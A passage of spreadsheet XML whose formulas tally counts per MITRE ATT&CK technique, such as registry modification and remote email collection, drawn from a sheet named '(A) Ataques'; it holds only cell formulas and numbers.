        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!BB30,"")</f>
        <v>6</v>
      </c>
      <c r="G30" s="392">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!BD30,"")</f>
        <v>3</v>
      </c>
      <c r="H30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!BF30,"")</f>
        <v>2</v>
      </c>
      <c r="I30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!BG30,"")</f>
        <v>2</v>
      </c>
      <c r="J30" s="530">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($F30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BH30,"")</f>
        <v>4</v>
      </c>
      <c r="L30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BJ30,"")</f>
        <v>4</v>
      </c>
      <c r="M30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BL30,"")</f>
        <v>2</v>
      </c>
      <c r="N30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BM30,"")</f>
        <v>4</v>
      </c>
      <c r="O30" s="532">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($K30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P30" s="292">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BN30,"")</f>
        <v>10</v>
      </c>
      <c r="Q30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BP30,"")</f>
        <v>7</v>
      </c>
      <c r="R30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BR30,"")</f>
        <v>4</v>
      </c>
      <c r="S30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BS30,"")</f>
        <v>4</v>
      </c>
      <c r="T30" s="530">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($P30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BT30,"")</f>
        <v>7</v>
      </c>
      <c r="V30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BV30,"")</f>
        <v>4</v>
      </c>
      <c r="W30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BX30,"")</f>
        <v>3</v>
      </c>
      <c r="X30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$BY30,"")</f>
        <v>2</v>
      </c>
      <c r="Y30" s="532">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($U30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z30" s="288">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!BZ30,"")</f>
        <v>11</v>
      </c>
      <c r="AA30" s="392">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!CB30,"")</f>
        <v>9</v>
      </c>
      <c r="AB30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!CD30,"")</f>
        <v>7</v>
      </c>
      <c r="AC30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!CE30,"")</f>
        <v>5</v>
      </c>
      <c r="AD30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF(Z30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CF30,"")</f>
        <v>18</v>
      </c>
      <c r="AF30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CH30,"")</f>
        <v>13</v>
      </c>
      <c r="AG30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CJ30,"")</f>
        <v>10</v>
      </c>
      <c r="AH30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CK30,"")</f>
        <v>5</v>
      </c>
      <c r="AI30" s="287">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($AE30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ30" s="292">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CL30,"")</f>
        <v>0</v>
      </c>
      <c r="AK30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CN30,"")</f>
        <v>0</v>
      </c>
      <c r="AL30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CP30,"")</f>
        <v>0</v>
      </c>
      <c r="AM30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CQ30,"")</f>
        <v>0</v>
      </c>
      <c r="AN30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($AJ30=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CR30,"")</f>
        <v>0</v>
      </c>
      <c r="AP30" s="322">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CT30,"")</f>
        <v>0</v>
      </c>
      <c r="AQ30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CV30,"")</f>
        <v>0</v>
      </c>
      <c r="AR30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!$CW30,"")</f>
        <v>0</v>
      </c>
      <c r="AS30" s="287">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($AO30=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT30" s="288">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!CX30,"")</f>
        <v>10</v>
      </c>
      <c r="AU30" s="392">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!CZ30,"")</f>
        <v>7</v>
      </c>
      <c r="AV30" s="4">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!DB30,"")</f>
        <v>4</v>
      </c>
      <c r="AW30" s="20">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",'(A) Ataques'!DC30,"")</f>
        <v>4</v>
      </c>
      <c r="AX30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($AT30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY30" s="469">
        <f>'(A) Ataques'!LU30+'(A) Ataques'!MA30+'(A) Ataques'!MG30+'(A) Ataques'!MM30+'(A) Ataques'!MS30</f>
        <v>1</v>
      </c>
      <c r="AZ30" s="510">
        <f>'(A) Ataques'!LW30+'(A) Ataques'!MC30+'(A) Ataques'!MI30+'(A) Ataques'!MO30+'(A) Ataques'!MU30</f>
        <v>1</v>
      </c>
      <c r="BA30" s="471">
        <f>'(A) Ataques'!LY30+'(A) Ataques'!ME30+'(A) Ataques'!MK30+'(A) Ataques'!MQ30+'(A) Ataques'!MW30</f>
        <v>1</v>
      </c>
      <c r="BB30" s="471">
        <f>'(A) Ataques'!LQ30</f>
        <v>1</v>
      </c>
      <c r="BC30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($AY30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD30" s="469">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!LL30,"")</f>
        <v>6</v>
      </c>
      <c r="BE30" s="510">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!LM30,"")</f>
        <v>2</v>
      </c>
      <c r="BF30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!LN30,"")</f>
        <v>1</v>
      </c>
      <c r="BG30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!LO30,"")</f>
        <v>1</v>
      </c>
      <c r="BH30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!LS30,"")</f>
        <v>2</v>
      </c>
      <c r="BI30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($BD30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ30" s="469">
        <f>'(A) Ataques'!OL30+'(A) Ataques'!OR30+'(A) Ataques'!OX30+'(A) Ataques'!PD30+'(A) Ataques'!PJ30</f>
        <v>2</v>
      </c>
      <c r="BK30" s="510">
        <f>'(A) Ataques'!ON30+'(A) Ataques'!OT30+'(A) Ataques'!OZ30+'(A) Ataques'!PF30+'(A) Ataques'!PL30</f>
        <v>2</v>
      </c>
      <c r="BL30" s="471">
        <f>'(A) Ataques'!OP30+'(A) Ataques'!OV30+'(A) Ataques'!PB30+'(A) Ataques'!PH30+'(A) Ataques'!PN30</f>
        <v>1</v>
      </c>
      <c r="BM30" s="495">
        <f>'(A) Ataques'!OH30</f>
        <v>2</v>
      </c>
      <c r="BN30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($BJ30=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO30" s="469">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!OC30,"")</f>
        <v>2</v>
      </c>
      <c r="BP30" s="510">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!OD30,"")</f>
        <v>2</v>
      </c>
      <c r="BQ30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!OE30,"")</f>
        <v>1</v>
      </c>
      <c r="BR30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!OF30,"")</f>
        <v>1</v>
      </c>
      <c r="BS30" s="471">
        <f>IF('(A) Ataques'!$AP30&lt;&gt;"NO",'(A) Ataques'!OJ30,"")</f>
        <v>2</v>
      </c>
      <c r="BT30" s="331">
        <f>IF('(A) Ataques'!$AK30&lt;&gt;"NO",IF($BO30=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A31" s="79">
        <f t="shared" si="0"/>
        <v>29</v>
      </c>
      <c r="B31" s="4">
        <f>IF('(A) Ataques'!AK31&lt;&gt;"NO",'(A) Ataques'!E31,"")</f>
        <v>25</v>
      </c>
      <c r="C31" s="6" t="str">
        <f>IF('(A) Ataques'!AK31&lt;&gt;"NO",IF('(A) Ataques'!M31="","",'(A) Ataques'!M31),"")</f>
        <v>T1112-Modify_registry</v>
      </c>
      <c r="D31" s="4" t="str">
        <f>IF('(A) Ataques'!AK31&lt;&gt;"NO",'(A) Ataques'!F31,"")</f>
        <v>T1112</v>
      </c>
      <c r="E31" s="286">
        <f>IF('(A) Ataques'!AK31&lt;&gt;"NO",'(A) Ataques'!AQ31,"")</f>
        <v>15</v>
      </c>
      <c r="F31" s="288">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!BB31,"")</f>
        <v>1</v>
      </c>
      <c r="G31" s="392">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!BD31,"")</f>
        <v>1</v>
      </c>
      <c r="H31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!BF31,"")</f>
        <v>1</v>
      </c>
      <c r="I31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!BG31,"")</f>
        <v>1</v>
      </c>
      <c r="J31" s="530">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($F31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BH31,"")</f>
        <v>0</v>
      </c>
      <c r="L31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BJ31,"")</f>
        <v>0</v>
      </c>
      <c r="M31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BL31,"")</f>
        <v>0</v>
      </c>
      <c r="N31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BM31,"")</f>
        <v>0</v>
      </c>
      <c r="O31" s="532">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($K31=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P31" s="292">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BN31,"")</f>
        <v>1</v>
      </c>
      <c r="Q31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BP31,"")</f>
        <v>1</v>
      </c>
      <c r="R31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BR31,"")</f>
        <v>1</v>
      </c>
      <c r="S31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BS31,"")</f>
        <v>1</v>
      </c>
      <c r="T31" s="530">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($P31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BT31,"")</f>
        <v>11</v>
      </c>
      <c r="V31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BV31,"")</f>
        <v>5</v>
      </c>
      <c r="W31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BX31,"")</f>
        <v>5</v>
      </c>
      <c r="X31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$BY31,"")</f>
        <v>2</v>
      </c>
      <c r="Y31" s="532">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($U31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z31" s="288">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!BZ31,"")</f>
        <v>28</v>
      </c>
      <c r="AA31" s="392">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!CB31,"")</f>
        <v>20</v>
      </c>
      <c r="AB31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!CD31,"")</f>
        <v>18</v>
      </c>
      <c r="AC31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!CE31,"")</f>
        <v>4</v>
      </c>
      <c r="AD31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF(Z31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CF31,"")</f>
        <v>39</v>
      </c>
      <c r="AF31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CH31,"")</f>
        <v>25</v>
      </c>
      <c r="AG31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CJ31,"")</f>
        <v>23</v>
      </c>
      <c r="AH31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CK31,"")</f>
        <v>4</v>
      </c>
      <c r="AI31" s="287">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($AE31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ31" s="292">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CL31,"")</f>
        <v>0</v>
      </c>
      <c r="AK31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CN31,"")</f>
        <v>0</v>
      </c>
      <c r="AL31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CP31,"")</f>
        <v>0</v>
      </c>
      <c r="AM31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CQ31,"")</f>
        <v>0</v>
      </c>
      <c r="AN31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($AJ31=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CR31,"")</f>
        <v>1</v>
      </c>
      <c r="AP31" s="322">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CT31,"")</f>
        <v>1</v>
      </c>
      <c r="AQ31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CV31,"")</f>
        <v>1</v>
      </c>
      <c r="AR31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!$CW31,"")</f>
        <v>1</v>
      </c>
      <c r="AS31" s="287">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($AO31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT31" s="288">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!CX31,"")</f>
        <v>2</v>
      </c>
      <c r="AU31" s="392">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!CZ31,"")</f>
        <v>2</v>
      </c>
      <c r="AV31" s="4">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!DB31,"")</f>
        <v>2</v>
      </c>
      <c r="AW31" s="20">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",'(A) Ataques'!DC31,"")</f>
        <v>2</v>
      </c>
      <c r="AX31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($AT31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY31" s="469">
        <f>'(A) Ataques'!LU31+'(A) Ataques'!MA31+'(A) Ataques'!MG31+'(A) Ataques'!MM31+'(A) Ataques'!MS31</f>
        <v>0</v>
      </c>
      <c r="AZ31" s="510">
        <f>'(A) Ataques'!LW31+'(A) Ataques'!MC31+'(A) Ataques'!MI31+'(A) Ataques'!MO31+'(A) Ataques'!MU31</f>
        <v>0</v>
      </c>
      <c r="BA31" s="471">
        <f>'(A) Ataques'!LY31+'(A) Ataques'!ME31+'(A) Ataques'!MK31+'(A) Ataques'!MQ31+'(A) Ataques'!MW31</f>
        <v>0</v>
      </c>
      <c r="BB31" s="471">
        <f>'(A) Ataques'!LQ31</f>
        <v>0</v>
      </c>
      <c r="BC31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($AY31=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD31" s="469">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!LL31,"")</f>
        <v>11</v>
      </c>
      <c r="BE31" s="510">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!LM31,"")</f>
        <v>10</v>
      </c>
      <c r="BF31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!LN31,"")</f>
        <v>0</v>
      </c>
      <c r="BG31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!LO31,"")</f>
        <v>6</v>
      </c>
      <c r="BH31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!LS31,"")</f>
        <v>8</v>
      </c>
      <c r="BI31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($BD31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ31" s="469">
        <f>'(A) Ataques'!OL31+'(A) Ataques'!OR31+'(A) Ataques'!OX31+'(A) Ataques'!PD31+'(A) Ataques'!PJ31</f>
        <v>5</v>
      </c>
      <c r="BK31" s="510">
        <f>'(A) Ataques'!ON31+'(A) Ataques'!OT31+'(A) Ataques'!OZ31+'(A) Ataques'!PF31+'(A) Ataques'!PL31</f>
        <v>2</v>
      </c>
      <c r="BL31" s="471">
        <f>'(A) Ataques'!OP31+'(A) Ataques'!OV31+'(A) Ataques'!PB31+'(A) Ataques'!PH31+'(A) Ataques'!PN31</f>
        <v>2</v>
      </c>
      <c r="BM31" s="495">
        <f>'(A) Ataques'!OH31</f>
        <v>1</v>
      </c>
      <c r="BN31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($BJ31=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO31" s="469">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!OC31,"")</f>
        <v>5</v>
      </c>
      <c r="BP31" s="510">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!OD31,"")</f>
        <v>2</v>
      </c>
      <c r="BQ31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!OE31,"")</f>
        <v>2</v>
      </c>
      <c r="BR31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!OF31,"")</f>
        <v>1</v>
      </c>
      <c r="BS31" s="471">
        <f>IF('(A) Ataques'!$AP31&lt;&gt;"NO",'(A) Ataques'!OJ31,"")</f>
        <v>1</v>
      </c>
      <c r="BT31" s="331">
        <f>IF('(A) Ataques'!$AK31&lt;&gt;"NO",IF($BO31=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A32" s="79">
        <f t="shared" si="0"/>
        <v>30</v>
      </c>
      <c r="B32" s="4">
        <f>IF('(A) Ataques'!AK32&lt;&gt;"NO",'(A) Ataques'!E32,"")</f>
        <v>26</v>
      </c>
      <c r="C32" s="6" t="str">
        <f>IF('(A) Ataques'!AK32&lt;&gt;"NO",IF('(A) Ataques'!M32="","",'(A) Ataques'!M32),"")</f>
        <v>T1114.002-Email_collection_remote_email_collection</v>
      </c>
      <c r="D32" s="4" t="str">
        <f>IF('(A) Ataques'!AK32&lt;&gt;"NO",'(A) Ataques'!F32,"")</f>
        <v>T1114</v>
      </c>
      <c r="E32" s="286">
        <f>IF('(A) Ataques'!AK32&lt;&gt;"NO",'(A) Ataques'!AQ32,"")</f>
        <v>10</v>
      </c>
      <c r="F32" s="288">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!BB32,"")</f>
        <v>7</v>
      </c>
      <c r="G32" s="392">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!BD32,"")</f>
        <v>5</v>
      </c>
      <c r="H32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!BF32,"")</f>
        <v>2</v>
      </c>
      <c r="I32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!BG32,"")</f>
        <v>5</v>
      </c>
      <c r="J32" s="530">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($F32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BH32,"")</f>
        <v>19</v>
      </c>
      <c r="L32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BJ32,"")</f>
        <v>4</v>
      </c>
      <c r="M32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BL32,"")</f>
        <v>1</v>
      </c>
      <c r="N32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BM32,"")</f>
        <v>4</v>
      </c>
      <c r="O32" s="532">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($K32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P32" s="292">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BN32,"")</f>
        <v>26</v>
      </c>
      <c r="Q32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BP32,"")</f>
        <v>9</v>
      </c>
      <c r="R32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BR32,"")</f>
        <v>3</v>
      </c>
      <c r="S32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BS32,"")</f>
        <v>5</v>
      </c>
      <c r="T32" s="530">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($P32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BT32,"")</f>
        <v>16</v>
      </c>
      <c r="V32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BV32,"")</f>
        <v>14</v>
      </c>
      <c r="W32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BX32,"")</f>
        <v>6</v>
      </c>
      <c r="X32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$BY32,"")</f>
        <v>9</v>
      </c>
      <c r="Y32" s="532">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($U32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z32" s="288">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!BZ32,"")</f>
        <v>39</v>
      </c>
      <c r="AA32" s="392">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!CB32,"")</f>
        <v>22</v>
      </c>
      <c r="AB32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!CD32,"")</f>
        <v>16</v>
      </c>
      <c r="AC32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!CE32,"")</f>
        <v>7</v>
      </c>
      <c r="AD32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF(Z32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CF32,"")</f>
        <v>55</v>
      </c>
      <c r="AF32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CH32,"")</f>
        <v>36</v>
      </c>
      <c r="AG32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CJ32,"")</f>
        <v>22</v>
      </c>
      <c r="AH32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CK32,"")</f>
        <v>9</v>
      </c>
      <c r="AI32" s="287">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($AE32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ32" s="292">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CL32,"")</f>
        <v>0</v>
      </c>
      <c r="AK32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CN32,"")</f>
        <v>0</v>
      </c>
      <c r="AL32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CP32,"")</f>
        <v>0</v>
      </c>
      <c r="AM32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CQ32,"")</f>
        <v>0</v>
      </c>
      <c r="AN32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($AJ32=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CR32,"")</f>
        <v>0</v>
      </c>
      <c r="AP32" s="322">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CT32,"")</f>
        <v>0</v>
      </c>
      <c r="AQ32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CV32,"")</f>
        <v>0</v>
      </c>
      <c r="AR32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!$CW32,"")</f>
        <v>0</v>
      </c>
      <c r="AS32" s="287">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($AO32=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT32" s="288">
